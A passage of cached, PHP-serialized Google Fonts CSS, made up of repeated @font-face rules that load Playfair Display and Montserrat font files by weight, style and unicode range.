U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTLYgFE_.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTzYgA.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTjYgFE_.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTPYgFE_.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTLYgFE_.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTzYgA.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}\";}s:315:\"https://fonts.googleapis.com/css?family=Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic|Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic&subset=latin,latin-ext&display=swap\";a:1:{s:12:\"google-fonts\";s:154984:\"/* Original: https://fonts.googleapis.com/css?family=Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic|Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic&subset=latin,latin-ext&display=swap *//* User Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 16_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.0 Mobile/15E148 Safari/604.1 *//* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxC7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRzS7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxi7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxy7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRyS7m0dR9pA.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxC7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRzS7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxi7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxy7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRyS7m0dR9pA.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxC7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRzS7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxi7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxy7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRyS7m0dR9pA.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxC7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRzS7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxi7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxy7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRyS7m0dR9pA.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxC7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRzS7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxi7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxy7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRyS7m0dR9pA.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxC7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRzS7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxi7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxy7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRyS7m0dR9pA.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxC7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRzS7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxi7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxy7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRyS7m0dR9pA.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxC7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRzS7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxi7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxy7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRyS7m0dR9pA.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxC7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRzS7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxi7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRxy7m0dR9pBOi.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: italic;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUQjIg1_i6t8kCHKm459WxRyS7m0dR9pA.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WRhyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459W1hyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WZhyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WdhyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WlhyyTh89Y.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WRhyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459W1hyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WZhyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WdhyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WlhyyTh89Y.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WRhyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459W1hyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WZhyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Montserrat\';font-style: normal;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/montserrat/v31/JTUSjIg1_i6t8kCHKm459WdhyyTh89ZNpQ.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, 